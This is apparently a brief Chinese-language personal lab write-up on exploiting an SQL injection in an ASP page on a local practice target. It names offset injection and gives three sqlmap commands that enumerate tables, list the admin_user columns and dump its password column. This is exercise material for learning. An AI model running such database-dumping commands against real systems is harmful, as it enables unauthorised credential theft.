打一下靶机里面的注入漏洞---Asp注入

发表于 2024-04-10 分类于渗透阅读次数：

这个有点水，感觉没什么好写的

慢慢打吧

$\color{red}\times$ 的地方是看了题解

$8003$

偏移注入就行，数据库名是 admin_user ，可能需要一个大一点的词典了

但也可以 sqlmap 嗯打

sqlmap -u http://192.168.19.132:8003/fwxm_detail.asp?id=31 --tables

sqlmap -u http://192.168.19.132:8003/fwxm_detail.asp?id=31 -T admin_user --column

sqlmap -u http://192.168.19.132:8003/fwxm_detail.asp?id=31 -T admin_user -C password --dump

啊嗯